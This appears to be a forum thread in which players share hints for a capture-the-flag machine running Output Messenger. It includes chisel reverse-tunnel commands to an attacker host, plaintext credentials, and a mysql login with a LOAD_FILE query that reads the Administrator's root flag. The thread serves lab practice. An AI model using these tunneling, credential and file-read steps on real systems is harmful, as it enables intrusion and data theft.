[bmoon10]

man i i'm in the chat i already did port forward and downloaded the app and logged in as k.turner but no thing usefull .. what u found ?

you can get MariaDB creds, portforward and login as root, then call the root flag. that's how I did it. I didn't get root shell

Where u got mariadb creds ?

its in C:\ProgramData\Output Messenger Server\Temp\OutputMessengerMysql.zip

---

man i i'm in the chat i already did port forward and downloaded the app and logged in as k.turner but no thing usefull .. what u found ?

you can get MariaDB creds, portforward and login as root, then call the root flag. that's how I did it. I didn't get root shell

well its definitely a unintended path.

[spamdegratis5]

O.martinez credentials can be found querying the API. You need the chatroom key (and obviously the api key, obtained after login using winrm_svc in the client) that can be found in the OM.db3 database, can be found in AppData folder of winrm_svc.

[jsvensson]

ehh i'm connected as m.harris to output messenger, i see in chat with admin UserExplorer.exe - but when i can't download. did port forward with chisel and with meterpreter but it doesn't work

[Unbutton8074]

ehh i'm connected as m.harris to output messenger, i see in chat with admin UserExplorer.exe - but when i can't download. did port forward with chisel and with meterpreter but it doesn't work

portforward 14122

[jsvensson]

ehh i'm connected as m.harris to output messenger, i see in chat with admin UserExplorer.exe - but when i can't download. did port forward with chisel and with meterpreter but it doesn't work

portforward 14122

thanks  i should thought that it could be related to other port

[ipfi]

ehh i'm connected as m.harris to output messenger, i see in chat with admin UserExplorer.exe - but when i can't download. did port forward with chisel and with meterpreter but it doesn't work

how are u able to connect with output messenger?
I have the unix client and try to connect with:

User: k.turner
Pass: MessengerApp@Pass!
Server: 10.129.225.184

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[grieving7]

In target

.\chisel client 10.10.16.28:14122 R:54565:127.0.0.1:14122

In my machine

chisel server --reverse --port 14122

What am I doing wrong? I also tried to forward ports using Meterpreter but it doesn't work.

[bmoon10]

In target

.\chisel client 10.10.16.28:14122 R:54565:127.0.0.1:14122

In my machine

chisel server --reverse --port 14122

What am I doing wrong? I also tried to forward ports using Meterpreter but it doesn't work.

from: https://support.outputmessenger.com/server-install-faq/

14121 TCP – Application
14122 TCP – File Transfer
14123 TCP – Web server for Browser Version
14124 TCP & UDP – VoIP for Voice/Video/Desktop Sharing

all the above ports have to be exposed to the attack machine only then outputmessenger in attack machine will function as intended 

#chisel server - kali / attack machine
$ chisel server -p 9999 --reverse

#chisel client (windows)
c:\temp\chisel client 10.x.y.z:9999 R:14121:127.0.0.1:14121 R:14122:127.0.0.1:14122 R:14123:127.0.0.1:14123 R:14124:127.0.0.1:14124

[ent0xE]

Root unintended:
1. chisel port 14406 to your machine
2. connect to mariadb

proxychains mysql -h 127.0.0.1 -P 14406 --database=outputwall -uroot -pibWijteig5

read root flag:

SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt') AS Result;

[Unbutton8074]

O.martinez credentials can be found querying the API. You need the chatroom key (and obviously the api key, obtained after login using winrm_svc in the client) that can be found in the OM.db3 database, can be found in AppData folder of winrm_svc.

those creds are working for messenger but not for host/rdp. am i missing something?